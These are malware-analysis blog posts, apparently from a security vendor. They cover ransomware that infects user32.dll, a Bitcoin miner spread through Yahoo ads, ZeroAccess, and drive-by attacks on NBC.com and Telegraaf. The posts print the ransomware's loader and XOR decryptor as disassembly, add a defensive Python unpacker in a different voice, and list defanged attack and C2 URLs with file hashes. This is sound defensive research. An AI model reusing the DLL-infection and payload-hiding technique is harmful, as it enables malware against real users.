Ransomware infecting user32.dll

June 13, 2014

Over the past months we’ve been monitoring a new variant of the Department of Justice (DOJ) ransomware.

To date nothing has been written about this new variant on the internet. This blog item aims to change that.

Analysis of this particular ransomware shows that it installs itself differently from previous ransomware samples. Instead of dropping an executable on the system, it infects a Windows system DLL: user32.dll.

This file is typically located in:
C:\Windows\System32\user32.dll
      or
C:\Windows\SysWOW64\user32.dll

So far we have only observed the ransomware infecting the 32-bit version of user32.dll (on 64-bit Windows that is the copy in SysWOW64).

Static detection
Our support desk helped a victim in January 2014. Four months later, detection is still poor:

[Screenshot: vt-user32 (VirusTotal results for the infected user32.dll)]

Resource section
The ransomware enlarges the resource section of user32.dll, as can be seen in the table below:

                 Original user32.dll                    Infected user32.dll
name     va        vsize     rawsize        name     va        vsize     rawsize
.text    0x1000    0x5f283   0x5f400        .text    0x1000    0x5f283   0x5f400
.data    0x61000   0x1180    0xc00          .data    0x61000   0x1180    0xc00
.rsrc    0x63000   0x2a088   0x2a200        .rsrc    0x63000   0x33a88   0x33c00
.reloc   0x8e000   0x2de4    0x2e00         .reloc   0x8e000   0x2de4    0x2e00

The raw size of .rsrc grows by 0x9a00 bytes (0x33c00 - 0x2a200), which is enough room for the 0x98bb-byte blob copied out of it later. Analysis of the enlarged resource section shows that it contains an encrypted payload with an embedded decryptor. Below we show how the malware becomes active once it has infected user32.dll.

EntryPoint patched
The entry point of an infected user32.dll (UserClientDllInitialize) is patched: the call that originally only ran for DLL_PROCESS_ATTACH (the cmp [ebp+0xC], 1 checks the fdwReason argument) is replaced by a call/add/jmp sequence that ends in AlignRects, as can be seen below:

Original:

UserClientDllInitialize:
7e41b217 8B FF          mov  edi, edi 
7e41b219 55             push ebp 
7e41b21a 8B EC          mov  ebp, esp 
7e41b21c 83 7D 0C 01    cmp  [ebp+0xC], 1 
7e41b220 75 05          jnz  0x7e41b227
 
7e41b222 E8 5D 07 00 00 call 0x7e41b984
 
7e41b227 5D             pop  ebp 
7e41b228 90             nop 
7e41b229 90             nop 
7e41b22a 90             nop 
7e41b22b 90             nop 
7e41b22c 90             nop 
7e41b22d 8B FF          mov  edi, edi 
7e41b22f 55             push ebp 
7e41b230 8B EC          mov  ebp, esp

Patched:

UserClientDllInitialize:
7e41b217 8B FF          mov  edi, edi 
7e41b219 55             push ebp 
7e41b21a 8B EC          mov  ebp, esp 
7e41b21c 83 7D 0C 01    cmp  [ebp+0xC], 1 
7e41b220 75 0E          jnz  0x7e41b230
 
7e41b222 E8 00 00 00 00 call 0x7e41b227
 
7e41b227 83 04 24 0A    add  [esp], 0xa 
7e41b22b E9 B0 22 05 00 jmp  AlignRects 
________________________________________
7e41b230 8B EC          mov  ebp, esp

The code at AlignRects is not the original either; it has been replaced with code that allocates a new block of executable memory and then copies the encrypted payload from the resource section into that memory.

AlignRects:
7e46d4e0  leave                       ; Discard the frame of UserClientDllInitialize
7e46d4e1  pusha 
7e46d4e2  push ebp
7e46d4e3  mov  ebp, esp
7e46d4e5  sub  esp, 8                 ; Locals: [ebp-4] = RegionSize, [ebp-8] = BaseAddress
7e46d4e8  mov  eax, [ebp+0x4C]        ; EAX becomes base-address of 
                                      ; user32.dll (7E410000), read from the stack
7e46d4eb  mov  ecx, eax
7e46d4ed  add  eax, 0x13bc            ; IAT slot at base + 0x13bc
7e46d4f2  mov  eax, [eax]             ; EAX becomes address of 
                                      ; NtQueryVirtualMemory

7e46d4f4  add  eax, 0xfffff5f0        ; EAX = NtQueryVirtualMemory - 0xa10, i.e.
                                      ; the address of NtAllocateVirtualMemory
                                      ; in this ntdll build
7e46d4f9  push 0x40                   ; Protect        = PAGE_EXECUTE_READWRITE
7e46d4fb  push 0x3000                 ; AllocationType = MEM_COMMIT | MEM_RESERVE
7e46d500  lea  ecx, [ebp-0x4]
7e46d503  mov  [ecx], 0xc576
7e46d509  push ecx                    ; &RegionSize    (0xc576 bytes)
7e46d50a  push 0                      ; ZeroBits
7e46d50c  lea  ecx, [ebp-0x8]
7e46d50f  mov  [ecx], 0
7e46d515  push ecx                    ; &BaseAddress   (NULL: let the kernel choose)
7e46d516  push 0xff                   ; ProcessHandle  (6A FF, sign-extended to -1 = current process)
7e46d518  call eax                    ; Call NtAllocateVirtualMemory
7e46d51a  mov  edi, [ebp-0x8]         ; EDI = allocated address
7e46d51d  mov  eax, edi
7e46d51f  mov  esi, [ebp+0x4C]        ; ESI = base-address of 
                                      ;       user32.dll (7E410000)
7e46d522  add esi, 0x8d200            ; ESI = address of encrypted payload 
                                      ;       in resource section
7e46d528  mov ecx, 0x98bb             ; Payload size in bytes
7e46d52d  rep movs es:[edi], ds:[esi] ; Copy 0x98bb bytes to the allocated 
                                      ; (executable) range
7e46d52f  leave 
7e46d530  add  eax, 0x981e            ; EAX = address of decryption code
                                      ;       (offset 0x981e inside the copy)
7e46d535  jmp  eax                    ; Start decryption !!

As this code shows, an executable (PAGE_EXECUTE_READWRITE) block of memory is allocated with NtAllocateVirtualMemory. The loader does not import that function; instead it reads the address of NtQueryVirtualMemory from the IAT of user32.dll and subtracts 0xa10 from it. That delta only holds for the ntdll.dll build the infector was written against, so the loader is tied to a specific Windows build.

The encrypted payload is copied into the newly allocated range of memory. This encrypted payload contains a small piece of decryption code, located near the end of the encrypted payload. This decryption code is shown below:

0:000> r
eax=0029981e ebx=7e41b217 ecx=00000000 edx=7c90e514 esi=7e4a6abb edi=002998bb
eip=0029981e esp=0007f9d4 ebp=0007fa10 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206

0:000> u eax l20
0029981e call 00299823
00299823 pop  edx                     EDX = current location (00299823) !
00299824 sub  edx,7FFA2F22h
0029982a push esi                     Save ESI (7e4a6abb, left by rep movs: end of the payload in user32.dll)
0029982b lea  esi,[edx+7FFA2F1Dh]     ESI = EDX - 5 = start of this decryptor (0029981e)
00299831 mov  ecx,981Eh               ECX = size to decrypt (num bytes)
00299836 sub  esi,ecx                 ESI = allocated mem-base (00290000)
00299838 push esi
00299839 mov  ebx,6FAAEh              The XOR key (BL only, so AEh)
0029983e xor  byte ptr [esi],bl       Decrypt byte-by-byte
00299840 inc  esi
00299841 inc  ebx                     Modify XOR key for each byte (+1)
00299842 loop 0029983e
00299844 pop  eax                     EAX = allocated mem-base (00290000)
00299845 pop  ecx                     ECX = saved ESI (7e4a6abb)
00299846 mov  dword ptr [eax+12h],ecx Patch that address into the decrypted code
00299849 jmp  eax                     Jump to allocated mem-base, 
                                      which is now decrypted.

The decryption of the payload uses an XOR-based scheme where the key byte (initially 0xAE) is incremented after every byte; since only BL is used, the key wraps around at 256.

Once all 0x981e bytes in front of the decryptor are decrypted, the now plain code is executed. Note the first two instructions of the decryption code, where a call/pop combination is used to obtain the current address.

This makes the decryption code position independent. The only ‘fixed’ values in this code are the size of the encrypted payload and the XOR key, so regenerating the payload and decryptor with a different size and key to evade static detection is trivial for the author.
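The flip side is that the same two fixed values are all an analyst needs to unpack the payload statically. The following Python is an added example, not code from the original post or from HitmanPro: it searches a blob (e.g. the dumped .rsrc section) for the decryptor stub with the size, key and displacement constants wildcarded, reads the size and key out of the match, and applies the rolling XOR to the bytes that precede the stub, exactly as the stub does at run time. The opcode bytes are my own encoding of the disassembled instructions, checked against the instruction lengths implied by the addresses in the windbg output, and are an assumption about the sample; the test blob at the bottom is constructed for the demonstration.

```python
import re
import struct

# Byte pattern for the position-independent decryptor stub disassembled above.
# The "fixed" values (two displacement constants, the size in `mov ecx` and the
# key in `mov ebx`) are wildcarded so re-keyed builds of the same stub still
# match. Encodings are an assumption derived from the instruction lengths in
# the windbg listing; `sub esi,ecx` has two valid encodings, both accepted.
STUB_RE = re.compile(
    rb"\xE8\x00\x00\x00\x00"       # call $+5
    rb"\x5A"                       # pop edx
    rb"\x81\xEA...."               # sub edx, imm32
    rb"\x56"                       # push esi
    rb"\x8D\xB2...."               # lea esi, [edx+disp32]
    rb"\xB9(....)"                 # mov ecx, imm32   -> number of bytes to decrypt
    rb"(?:\x2B\xF1|\x29\xCE)"      # sub esi, ecx
    rb"\x56"                       # push esi
    rb"\xBB(....)"                 # mov ebx, imm32   -> XOR key (only BL is used)
    rb"\x30\x1E\x46\x43\xE2\xFA",  # xor [esi],bl / inc esi / inc ebx / loop
    re.DOTALL,
)


def rolling_xor(data: bytes, key: int) -> bytes:
    """The sample's scheme: byte i is XORed with (key + i) & 0xFF.

    `inc ebx` bumps the whole register but only BL is used, so the key wraps
    at 256. XOR is its own inverse: the same call encrypts and decrypts.
    """
    return bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(data))


def find_decryptor(blob: bytes):
    """Locate the stub in a blob; return (stub_offset, size, key) or None."""
    m = STUB_RE.search(blob)
    if m is None:
        return None
    size = struct.unpack("<I", m.group(1))[0]
    key = struct.unpack("<I", m.group(2))[0] & 0xFF   # BL only
    return m.start(), size, key


def unpack_payload(blob: bytes) -> bytes:
    """Recover the plaintext the stub would produce at run time.

    At run time ESI = stub address - ECX, i.e. the stub decrypts exactly the
    `size` bytes that precede it. A size larger than the bytes available is a
    malformed (or deliberately broken) stub and is rejected, not wrapped.
    """
    found = find_decryptor(blob)
    if found is None:
        raise ValueError("decryptor stub not found")
    off, size, key = found
    if size == 0 or size > off:
        raise ValueError(f"stub claims {size:#x} bytes but only {off:#x} precede it")
    return rolling_xor(blob[off - size:off], key)


def build_stub(size: int, key: int) -> bytes:
    """Assemble a stub with the sample's layout (used only to build test input)."""
    return (
        b"\xE8\x00\x00\x00\x00" + b"\x5A"
        + b"\x81\xEA" + struct.pack("<I", 0x7FFA2F22)
        + b"\x56"
        + b"\x8D\xB2" + struct.pack("<I", 0x7FFA2F1D)
        + b"\xB9" + struct.pack("<I", size)
        + b"\x2B\xF1" + b"\x56"
        + b"\xBB" + struct.pack("<I", 0x60000 | key)
        + b"\x30\x1E\x46\x43\xE2\xFA"
        + b"\x58\x59\x89\x48\x12\xFF\xE0"   # pop eax / pop ecx / mov [eax+12h],ecx / jmp eax
    )


# Constructed test input (not from the malware): a stand-in "payload" encrypted
# with key 0xAE, followed by a matching stub, surrounded by filler bytes.
PLAINTEXT = b"MZ\x90\x00This is a constructed stand-in for the PE payload." + bytes(range(256)) * 2
SAMPLE_BLOB = (
    b"\x00" * 0x40
    + rolling_xor(PLAINTEXT, 0xAE)
    + build_stub(len(PLAINTEXT), 0xAE)
    + b"\xCC" * 0x10
)

if __name__ == "__main__":
    off, size, key = find_decryptor(SAMPLE_BLOB)
    print(f"stub at {off:#x}, decrypts {size:#x} bytes with key {key:#04x}")
    print(unpack_payload(SAMPLE_BLOB)[:4])
```

Run against a real dump, the offset of the stub doubles as a check on the loader: in the sample the stub sits 0x981e bytes into the 0x98bb-byte copy, so the blob to feed in is the 0x98bb bytes at RVA 0x8d200 of the infected DLL.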

[Screenshots: user32-decrypted2, user32-decrypted1 (the decrypted payload in memory)]

Once the ransomware becomes active, some typical ransomware behavior is performed:

  • Windows Safe Mode is disabled
  • Task Manager is blocked
  • Command Prompt is blocked
  • Registry Editor is blocked

… and of course the police-themed screen is shown, demanding a ransom to unlock the PC (see the picture at the top of this article).

Victims can use the very easy-to-use HitmanPro.Kickstart to get rid of police themed ransomware infection.

Blocking CD-ROM drives
A new property of this particular ransomware is that it disables CD-ROM drives. On some computers this makes the system harder to clean, as explained below.

When HitmanPro detects an infected system file, it searches the computer for a white-listed copy, since Windows tends to keep copies of system files in multiple locations on the hard disk.
If HitmanPro cannot find a known-safe, white-listed version, it prompts for the Windows installation CD/DVD that came with the computer. This feature, which returns infected system files to their pristine state, has been in HitmanPro for years and is very useful.

But since this new ransomware infection blocks access to the CD/DVD the user can no longer provide the Windows installation media for original files.

New Cloud Service
EDIT: HitmanPro build 219 (or newer) queries a new HitmanPro-cloud service that can provide a clean system file so that the user no longer has to provide Windows installation media.

32-bit: http://dl.surfright.nl/HitmanPro.exe
64-bit: http://dl.surfright.nl/HitmanPro_x64.exe

 

Samples:

3AF4FA2BFFAAB37FD557AE8146AE0A29BA0FAF6D99AD8A1A8D5BF598AC9A23D1
3A061EE07D87A6BB13E613E000E9F685CBFFB96BD7024A9E7B4CB0BE9A4AF38C
7DD93123078B383EC179C4C381F9119F4EAC4EFB287FE8F538A82E7336DFA4CA

Background on hyped Bitcoin miner served via Yahoo

January 10, 2014

Last Friday security researchers from Fox-IT noticed that Yahoo was inadvertently spreading malware via its advertisement services. Last Monday the Israel-based security company Light Cyber spread a much hyped press release that most of the malware was used to mine Bitcoins. I am personally a bit surprised that the BBC, The Guardian and even Interpol tweeted about it, as Light Cyber provided little to no details or evidence.

[Screenshot: interpol (the Interpol tweet)]

The story is not completely wrong but, when you read those articles, the perception now is that the entire attack revolved around Bitcoin mining, which is false.

We saw the Bitcoin miner too but left it out of our initial excerpt because, according to our own telemetry, only 4% of the victims we rescued received this malware. And contrary to popular belief, click fraud and banking malware are far quicker to monetize than mining Bitcoins with malware: a miner needs specific hardware to be effective and will not survive long on a victim’s computer. This miner is easily picked up by antivirus software, and infected users will certainly notice the stressed processor and/or GPU, which seriously hinders normal work or gaming.

Let me provide some useable evidence.

Citadel
We found that a Citadel trojan in this attack pulled in the Bitcoin miner about a minute after the PC got infected. Citadel is based on the Zeus banking malware, also known as Zbot. It typically creates a randomly named folder under %AppData% and uses a random filename of 5 or 6 characters, e.g.:

C:\Users\<user>\AppData\Roaming\Iquha\ruyvy.exe

On each victim computer this malware is uniquely obfuscated to evade antivirus detection.

cgminer
The Bitcoin miner, however, is a wrapped version of the abused legitimate tool cgminer, version 3.7.2 to be exact. cgminer is a multi-threaded, multi-pool FPGA and ASIC miner that relies on the OpenCL framework for the hashing computations. OpenCL is mandatory for cgminer and is not installed on Windows by default, so cgminer only works on machines with the OpenCL SDK installed or with gaming-oriented hardware, as OpenCL.dll only ships with certain AMD and NVIDIA display drivers.

In this attack, the cgminer malware was installed here:

C:\JvaApp\wdsdll.exe

When the victim computer is equipped with a modern GPU, this tool produces hash rates orders of magnitude higher than a CPU alone. Without a capable GPU it bails out with “clDevicesNum returned error, no GPUs usable”.

[Screenshot: cgminer]

The miner uses libcurl for communication with a mining pool. Libcurl is also legitimate software.

Some SHA-256 hashes for the security community:

9621744EF9C063DAB33CCA0FD4CCB24D79D227AC29D28CD27797338ACD9ABD47
A99253A538C3EF1945E146050645E321DA3B055A2624F83356FCB3F8C37B0DB3
31DD1B7A65EEC28F0D2B03E070290494A945AD4643053D8396B5DC65DE595409
26CE58F04C7A002CDBE6F05BADF0E986825B25138802368D79C300B3E2E2E2F0

So the attackers do not have a 2.5-million-node Bitcoin mining network (or ‘bitnet’), and such a ‘bitnet’ is less effective than some think. A single infected computer with, for example, a decent NVIDIA GTX 560 Ti (about 85.1 MHash/s) would take a week to generate €0.1430. We do not have the hardware specifications of the victim computers, so let’s assume (hypothetically) that 1/4 of the infected machines had this display card. Also assuming the miner was noticed by neither antivirus software nor the user, this ‘bitnet’ of 25,000 computers (1/4 of 4% of 2.5 million) would have generated about 5.5 BTC in that week, or €3,575 at the current exchange rate of the virtual currency.

The created perception that Bitcoin mining was the driving force behind the Yahoo attack is plain wrong. The attack is about the people who earned a lot by renting out their malware staging area at Yahoo to a multitude of criminals, hence the enormous variety of malware. Malware designed to steal your identity or banking credentials is far more threatening than malware that only takes a toll on your computer’s speed.


HitmanPro rescues anti-virus programs from malware attack

June 3, 2013

ZeroAccess Bag of Tricks
We’ve blogged a few times before about the tricks of the ZeroAccess malware family (aka ZAccess/Sirefef/Max++). For example, in July 2011 we blogged about ZeroAccess injecting a deadly payload into antivirus products and in June 2012 we blogged about ZeroAccess hiding its malicious code in an NTFS Extended Attribute.

Reparse Point
Recently a new ZeroAccess variant has been spreading that employs a new trick to disable antivirus products: it places NTFS Reparse Points on the files of the antivirus, causing access to those files to be redirected elsewhere.

In the following screenshots (taken with the Junction tool from Mark Russinovich, Sysinternals) you can see that ZeroAccess has placed a Reparse Point (type Symbolic Link) on the files of Microsoft Security Essentials. These reparse points redirect file access to a different location, which disables Microsoft Security Essentials:

Also using the ordinary dir-command you can see that redirection to [c:\windows\system32\config] is in place:

File Permissions
In addition to setting Reparse Points, ZeroAccess also strips the permissions from the files, as can be seen in the following screenshot:

[Screenshot: Permissions Stripped]

To the rescue
On May 23rd we released HitmanPro build 198, which removes the reparse points from Windows Defender and Microsoft Security Essentials and restores the permissions on their files.

Here is a video showing the redirection of the files belonging to Windows Defender and Microsoft Security Essentials:

The repair of Windows Defender and Microsoft Security Essentials by HitmanPro is free.

Download
Existing users of HitmanPro are automatically updated to the latest version while new users can download HitmanPro from here: get.hitmanpro.com.


HitmanPro removes child pornography

March 28, 2013

Today we have released HitmanPro version 3.7.3. One of the new features is the removal of child pornography that is dropped by the latest Urausy ransomware.

Urausy ransomware locks the computer and displays images to convince the user that child pornography was found on it. The images displayed by the ransomware are there to compel the victim to pay the 100 euro “fine”. You should never pay the ransom.

Forensic Clustering
Having child pornography on the computer is illegal. Therefore HitmanPro version 3.7.3 not only removes the ransomware, but also the child pornography files. HitmanPro uses its forensic file clustering feature to relate the images to the ransomware, so the images are deleted along with it. An example:

[Screenshot: Kickstart in action against Urausy]

Kickstart Improvements
The easiest way to remove any kind of ransomware is HitmanPro.Kickstart. HitmanPro version 3.7.3 offers an improved Kickstart Bootstrap loader that lets you boot straight into your ransomed, but familiar, Windows environment, bypassing the ransomware. There is no need to become familiar with the tools of other operating systems such as Linux.

Besides killing ransomware, HitmanPro.Kickstart is also very useful for removing rogue antivirus malware. For example, Disk Antivirus Professional and AVASoft Antivirus Professional, both members of the Winwebsec malware family, prevent you from starting any malware removal tools.

[Screenshot: AVASoft Antivirus Professional]

While HitmanPro already offers Force Breach to counter attacks on the HitmanPro process, you can now also use HitmanPro.Kickstart, because new in version 3.7.3 is Kickstart hardening, which protects the HitmanPro application from being killed by external processes.

So if you boot your computer with HitmanPro.Kickstart, you can now easily kill rogue antiviruses as well.

Happy Easter!

HitmanPro 3.7.3 Changelog

  • ADDED: Removal of child pornography images dropped by Urausy ransomware.
  • ADDED: Detection of zero-day Urausy ransomware through forensic file clustering.
  • ADDED: Kickstart hardening to protect HitmanPro processes from Winwebsec malware family.
    Use Kickstart against Disk Antivirus Professional, AVASoft Antivirus Professional or other rogue antiviruses.
  • IMPROVED: Forensic file clustering speed.
  • IMPROVED: Reduced memory usage during forensic file clustering.
  • IMPROVED: Processing of registry key values.
  • FIXED: On some BIOSes, when booting with Kickstart, Windows loader would hang with either frozen screen or blinking cursor.
  • UPDATED: Kickstart Bootstrap loader 2.1.
  • UPDATED: Embedded white lists.

Download
http://www.surfright.nl/downloads


NBC.com hacked, serving up Citadel malware

February 21, 2013

A few hours ago Ronald Prins of Fox-IT (@cryptoron) was tweeting about NBC.com infecting its visitors with malicious software (malware). We were investigating this as well and found the following interesting facts.

Update: Fox-IT has also posted a blog item on the incident.

There were two exploit links on the NBC website. The first was on the main default (entry) page, the second in hxxp://www.nbc.com/assets/core/js/s_wrapper.js

[Screenshot: s_wrapper_js]

It serves both Java (CVE-2013-0422) and PDF exploits. The exploit drops the Citadel Trojan, which is used for banking fraud and cyber-espionage. The Citadel malware communicates with the following server, which has already been sinkholed:

hxxp://184.82.177.125/tr2002/file.php
hxxp://184.82.177.125/tr2102/file.php

We’ve seen at least two different Citadel Trojans. MD5 hashes of the droppers:
c26c64c3129fca7aafe695904d5976da
16ee24be6b0afac36c994c9568e24331

An hour later the attack pages were swapped, which means the cyber criminals still have access to NBC’s pages. We’ve seen them linking to e.g.:

hxxp://umaiskhan.com/ztuj.html
hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://priceworldpublishing.com/aynk.html
hxxp://nikweinstein.com/cl/google.php
hxxp://walterjeffers.com/ctuk.html
hxxp://barbecuechickenrecipes.org/ctuk.htm
hxxp://toplineops.com/mtnk.html
hxxp://fabricaequiposestetica.com/ztuj.htm


RedKit Exploit Kit

The attacks were carried out by the RedKit Exploit Kit. One of RedKit’s noticeable features is that it can generate and rotate attack URLs every hour.

RedKit was also used last year during the Telegraaf attack in The Netherlands, which served the Citadel Trojan from the Pobelka botnet (Dutch). The Pobelka botnet stole 750GB of highly sensitive information (including usernames, passwords, certificates, documents and other data) from over 150,000 computers in networks of the Dutch government, hospitals, vital infrastructure such as water and power plants, airlines, multinationals and other companies.


Just a coincidence
Did you know that the Citadel Trojan responsible for the Dorifel outbreak in The Netherlands last year had the NBC logo as its file icon?

[Image: dorifel-citadel]


On-Demand Detection and Timeline
HitmanPro’s behavioral scan detects zero-day Citadel malware quite easily, as can be seen in the screenshot below.

The new forensic clustering feature of HitmanPro establishes a post-infection timeline. So even if you got infected a few days ago, HitmanPro provides evidence of how that happened.

[Screenshot: Citadel infection]


ZeroAccess

Some of the victims have also been infected with the ZeroAccess malware after visiting NBC.com:
994da098a62905385af8481329bf7c70

[Screenshots: nbc-zeroaccess, nbc-zeroaccess-hitmanpro]

The ZeroAccess malware alters an affected user’s Internet experience by modifying search results, and generates pay-per-click advertising revenue for its controllers, the cybercriminals. ZeroAccess is a dangerous threat that uses stealth techniques to hinder its detection and removal.


Unknown malware
The attack also served an unknown malware binary, connecting to various websites:

hxxp://envirsoft.com/d.htm
hxxp://eastsidetennisassociation.com/l.htm
hxxp://magasin-shop.com/r.htm
hxxp://beautiesofcanada.com/o.htm

Some antivirus vendors identify this malware as Zbot or a rootkit (MD5: 1fa5afe1ddcd083d40b5b330fd9b3613), but it is most definitely not Zbot and it is not a rootkit either. The malware binary has a curious filename (3S4H3S.exe) and an interesting string at the end, “SadokBdi”. If you Google Sadok or Kodas, you come across some interesting webpages.

[Screenshot: SadokBdi]


Facebook.com
While the attack is ongoing, Facebook.com is preventing posts linking to NBC.com, as can be seen from this screenshot:

[Screenshot: Facebook]


Perform Second Opinion Scan
If you’ve visited NBC.com today, you should perform a FREE second opinion scan to see if your computer got infected. You can download HitmanPro from here: get.hitmanpro.com


Late Night Show Jimmy Fallon

4 hours after the initial detection, the webpages of NBC.com still contained iframes opening exploit sites. In addition, we have seen other webpages like hxxp://www.latenightwithjimmyfallon.com and hxxp://www.jaylenosgarage.com serving some of the same links as NBC.com. This is also confirmed by the guys at the Sucuri Blog.


Antivirus shortens the life-time of financial malware

October 23, 2012

This title states the obvious, but most financial malware (banking Trojans) is specifically designed by cyber-criminals to avoid detection and hide from antivirus programs. The main goal of these digital bank robbers is clearly to steal your money by manipulating online bank transactions.

Research by SurfRight shows that the average life-time of a banking Trojan on a computer is 81 days for computers that do not have an up-to-date antivirus program. And the average life-time of a banking Trojan on a fully protected computer, that has an up-to-date antivirus program, is 25 days.

New users
These statistics are based on scan results from new users running HitmanPro for the first time. Since they depend on a user’s decision to seek a second opinion and download HitmanPro, these numbers should not be taken as exact science. Nonetheless, they are a clear indication that an up-to-date antivirus program dramatically reduces the life-time of a banking Trojan.

Long time
Many people will now ask “why didn’t the antivirus program catch the banking Trojan right away? 25 days is still a long time.”

That is a valid question. If the banking Trojan is stopped right away, HitmanPro will not find one on that computer, because it was never there. Antivirus programs will stop the vast majority of malware attacks, but not 100%.

  • Does the police prevent all robberies? They should, but they don’t.
  • Does the coast guard stop all drug transports before entering the country? They should, but they don’t.
  • Is a doctor’s diagnosis correct every time? It should, but it isn’t.

In other words: Using an antivirus program on your computer will stop most malware attacks, and will reduce the life-time of malware that has slipped the defenses and silently installed itself on the computer.


BBC Click: How banking Trojans go undetected and steal your money

How did we measure?
2,465,497 users scanned their computer with HitmanPro between October 2011 and October 2012 (1 year). The above mentioned statistics are not based on a laboratory research but are derived from real-world computers. The HitmanPro agent reported back the date the banking Trojan was installed on the computer, including which antivirus program the user was using (including its status) before HitmanPro removed the banking Trojan. The specific banking Trojans we counted for this statistic were Zeus, Citadel, SpyEye and Tinba.

Dorifel
Last August, our HitmanPro agent discovered Citadel Trojans within the Dutch government during the Dorifel outbreak. We also found that these Trojans had been active on fully protected computers for roughly three to four weeks without being detected. That period, shocking to most people, was clearly not an isolated incident but is in line with our research results.


Banking Trojan keeps hitting the Dutch hard

September 8, 2012

Two days ago, Thursday September 6th, the website of the popular Dutch newspaper Telegraaf.nl was serving its visitors zero-day malware. Telegraaf.nl is ranked #10 on the list of most popular websites in The Netherlands. Even though the media kept naming Telegraaf.nl as the origin of the attack, technically it was caused by a compromised website of a Dutch online marketing company that handles newsletters and email marketing for Telegraaf.nl. This online marketing company handles online activities for other well-known Dutch companies too, including some non-profit organizations.

More Dutch websites compromised
To avoid discrediting this relatively small company, its name was deliberately kept under wraps and everybody referred to Telegraaf.nl when discussing the Thursday outbreak. But according to our research, it wasn’t just this small marketing company that was involved in this attack vector that day. We’ve seen other compromised Dutch websites (running vulnerable versions of the Joomla CMS) with an iframe pointing to the exact same attack site. This attack site was located in Denmark and was hosted on a .com domain registered to a Dutch citizen (a legitimate website that the attackers had compromised and turned into an attack site).

Since the site is hosted in Denmark, you can imagine that it takes a bit more time to take down an attack site hosted in a country other than The Netherlands – it requires international cooperation. Thanks to efforts of others, like the Dutch National Cyber Security Centre (NCSC), the attack page in Denmark was suspended on Friday afternoon.

RedKit Exploit Kit
The attack site was hosting a counter.php which was actually the RedKit exploit kit. One of RedKit’s noticeable features is that it can generate and rotate attack URLs every hour. These URLs point to other compromised websites, which makes it difficult to reliably block RedKit’s URLs. The exploit kit uses an HTTP 302 response to redirect the browser straight to the actual attack URL.

To defend itself against malware researchers, RedKit is equipped with new anti-forensic features.

AV-Test
Another important feature of this exploit kit is that it allows the attackers to upload an executable (malware) and test it against 37 different antivirus solutions, so they can tune their attacks and ensure results:


[Image by SpiderLabs]

CVE-2012-4681
To infect computers, this exploit kit abuses a recently discovered vulnerability in Java, registered under CVE-2012-4681. This vulnerability affects Java 7 Update 6 (or older) and Java 6 Update 34 (or older). Since this vulnerability was patched by Oracle just days ago, and knowing that the cybercriminals using RedKit optimized their malware to bypass AV protection, not many computers could withstand this attack.

Below is an overview of the malware that HitmanPro encountered on systems infected by this attack (the detection ratio was determined with VirusTotal at the time of the initial attack):

45% of the computers affected by this attack were infected with the Citadel malware. The other malware is also designed to steal or generate money.

We were able to identify this initially unknown malware by correlating the timestamp of the infection with that of the initial downloader on the victim machines (the downloader installed the unknown malware within 3 minutes). SHA-256 hashes:

Downloader
8AEA345D4CF97163C60E73AFC7A5B83B4173B3BFD3BF20C37106F1ABFD75834F

Citadel
FA340A57E957F728960B2F5CE53A6FA3463DA45D0AC0B0661AFD1D6D6C346B7B

ZeroAccess
B589605757666883E3C98D1EB2714B5135D7F218D47591DB9EB01FB59BE714A0

Live Security Platinum
3B1FA7D912E968D091A336922932173E5977D9D67F2EA96AC77408CEE95331D5

Note: The Citadel malware is a descendant of the Zeus banking Trojan and re-encrypts itself each time it infects a victim, making each infection unique.

The Dutch government issued an initial warning about the fake antivirus. But after a few hours we could see that it was not the fake antivirus people should’ve been worried about: it’s the Citadel banking Trojan that affected most systems. Contrary to the fake antivirus, which is very visible and popping up on people’s screens, the Citadel banking Trojan is specifically designed to be invisible, for both users and antivirus programs.

HitmanPro detects this malware through behavioral analysis and/or signature detection. It also thoroughly removes these infections and repairs services.exe, which is difficult for most AV products to fix. More about that in our blog ZeroAccess – From Rootkit to Nasty Infection.

Image: HitmanPro detecting Live Security Platinum, ZeroAccess and Citadel malware

Citadel leading the Dutch Malware Prevalence Top 25
I’d also like to refer to July’s top 25 of prevalent malware where, in The Netherlands, the Citadel banking Trojan ranks #1. FakeAV and ZeroAccess rank #2 and #5 respectively. World-wide, the Zeus family (where Citadel is part of) ranks #6.

Thank You
I would like to thank the Dutch National Cyber Security Centre (NCSC) for providing us information during the initial research.


Win 8 Security System and its Rootkit

August 31, 2012

Rogue security software (aka FakeAV or Fake Antivirus) is a form of Internet fraud using malicious software (malware) that deceives or misleads users into paying money for fake or simulated removal of malware. Typically these programs do not have a virus definition database nor a virus scan engine. All of the processes of a security program are imitated to scare victims into believing that their computers are infected with critical risk malware and viruses.

Since 2008 FakeAV has been one of the most common malware families that HitmanPro finds on computers protected by an up-to-date antivirus program. The reason is that security vendors have a hard time keeping up with the cybercriminals, who obfuscate and release new versions and variants of their annoying creations almost every day. Each iteration also has a deceiving name like Security Shield or Live Security Platinum. And to further pressure victims into paying, most rogue security software protects itself by preventing legitimate programs from starting, including productivity software, internet security software and rescue tools. So you can imagine why FakeAV still takes the #1 position on our Malware Prevalence Top 25 month after month.

Rootkit
The reason for writing this article is that we found a new FakeAV which takes a different approach of deceiving and frustrating its victims. This new FakeAV is called Win 8 Security System:

Unlike its predecessors this FakeAV comes with a special rootkit driver which monitors and manipulates the operating system, taking control of every other process and program on the computer. One of the main purposes of the rootkit is to repair the FakeAV program (make it stick to the machine) and to make removal complicated.

Detection of the rootkit driver is currently very low: only 1 out of 42 well-known antivirus programs identifies it:

The rootkit driver is installed in the Windows drivers folder and has a random name, e.g. C:\Windows\system32\drivers\51991c15f7a6834.sys

64-bit Driver
The malware installs a different driver on computers running 64-bit Windows and disables 64-bit kernel-mode driver signing on these machines. Nonetheless, the cybercriminals went an extra mile by self-signing it with a certificate. Note the validity period, which starts on August 30 (yesterday):

Fake Action Center
The malware shows a fake Action Center, telling the victim the computer is not properly protected against viruses and spyware. When you want to open the real Action Center from the Control Panel, the malware will open the fake one instead:

Browser Hijacker
FakeAV often configures the proxy settings of your computer to intercept web browsing. This malware is different and uses its rootkit to hijack Internet Explorer and Google Chrome to display fake security warning messages when you try to browse the Internet:


Shortcuts
Interestingly, shortcuts that belong to the malware (created on the Start Menu and on the Desktop) all link to the Windows command-line registry editor reg.exe. When the victim clicks on, for example, the Buy Win 8 Security System shortcut, a harmless registry entry is created, which is monitored by the rootkit.

